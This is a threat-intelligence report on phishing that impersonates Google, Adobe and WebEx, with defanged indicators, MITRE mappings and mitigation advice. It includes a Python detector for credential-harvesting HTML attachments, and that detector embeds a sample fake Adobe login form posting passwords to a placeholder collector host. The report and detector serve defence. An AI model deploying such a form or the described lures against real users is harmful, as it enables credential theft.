Latest Phishing Campaigns Target Google, Adobe and WebEx

Overview: Latest Phishing Campaigns Impersonating Common Applications

This report is an overview of recent phishing campaigns that impersonate Google, Adobe and WebEx. Phishing is one of the most common initial attack vectors for malware, including ransomware such as Ryuk.

Tactics, Techniques, and Procedures

Research by Armorblox reveals a pattern in which threat actors use legitimate services such as Google Forms, Google Docs and Firebase to host phishing content. As is common in phishing attacks, these emails impersonate well-known companies and authorities to pressure users into acting. One of the emails analyzed directed users to a Google Form that mimicked the familiar Microsoft sign-in page. Because the links point to legitimate Google services, these emails can evade security controls.


[Figure: example of a benefactor scam email containing a Google Form link. Source: Armorblox]

Separately, anti-phishing solution provider Cofense uncovered an increase in phishing campaigns impersonating Adobe Document Cloud and Cisco WebEx. WebEx is a common service impersonated in phishing campaigns.

In the attack observed by Cofense, the domains “hxxp://eliteddi[.]com” and “hxxp://idbrokerwebex[.]com” were used to host convincing content impersonating a WebEx meeting invitation.

The Adobe attacks arrive with an attached HTML document containing a spoofed Adobe Document Cloud login form, which submits the entered data to “infiniteworks[.]net/IDI/high.php.” Upon further investigation of the domain, we uncovered additional phishing URLs impersonating Adobe, Lloyds Banking Group and Google within the same IDI directory. The website is hosted through BlueHost and runs a WordPress installation with the default “Twenty Seventeen” theme.

Source: Cofense
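As an added illustration (not code from Avertium, Cofense or the original report), the following Python script shows one way a mail gateway or sandbox could flag the HTML-attachment technique described above: it parses an attachment, finds any form that collects a password, and reports forms whose action posts to a host outside an assumed allowlist of legitimate login hosts. The sample attachment, the placeholder host and the allowlist are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample of a credential-harvesting HTML attachment: a fake
# Document Cloud sign-in form posting to a placeholder host (not a real IOC).
SAMPLE_ATTACHMENT = """<html><body>
<h2>Adobe Document Cloud - sign in to view your file</h2>
<form method="post" action="https://collector.example.net/IDI/high.php">
  <input type="email" name="email"><input type="password" name="pass">
  <input type="submit" value="View document">
</form></body></html>"""

# Hosts a genuine Adobe login form could post to (assumed for this example;
# a deployment would keep such a list per impersonated brand).
EXPECTED_LOGIN_HOSTS = {"adobe.com", "adobelogin.com"}


class FormCollector(HTMLParser):
    """Record every <form> action together with the input types inside it."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": set()}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].add((a.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_allowed(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in EXPECTED_LOGIN_HOSTS)


def find_credential_forms(html: str, base_url: str = "file:///attachment.html"):
    """Return (action URL, host) for each password form posting off-brand."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if "password" not in form["inputs"]:
            continue  # not a credential form (e.g. a search box)
        target = urljoin(base_url, form["action"])
        host = (urlsplit(target).hostname or "").lower()
        if not host_allowed(host):
            findings.append((target, host))
    return findings
```

A relative form action inside an attachment resolves against the file URL and therefore also shows up as a finding, which is the desired behaviour since a genuine login page would never be delivered that way.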

Business Unit Impact

  • May lead to compromised user accounts and unauthorized access to data and systems
  • May provide malicious actors a foothold within your network to be used for lateral movement

Recommendations

  • Provide users with training on best practices to avoid phishing, as well as awareness of recent trends in phishing campaigns
  • Implement MFA for users and services
  • Block the IOCs listed below

Indicators of Compromise (IOC)

  • infiniteworks[.]net
  • eliteddi[.]com
  • idbrokerwebex[.]com
  • 70[.]40[.]220[.]123
  • 192[.]185[.]214[.]103
  • 216[.]172[.]161[.]34

Sources

  • https://www.armorblox.com/blog/ok-google-build-me-a-phishing-campaign/
  • https://cofense.com/online-leader-invites-you-to-this-webex-phish/
  • https://cofense.com/document-sharing-services-represent-a-vector-for-phishing-campaigns/

Supporting Documentation:

  • MITRE Mapping(s)
    • Initial Access: https://attack.mitre.org/tactics/TA0001/
      • Phishing: https://attack.mitre.org/techniques/T1566/

Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report outlines a “top-of-mind” threat and how it ought to be addressed.

This informed analysis is based on the latest data available.
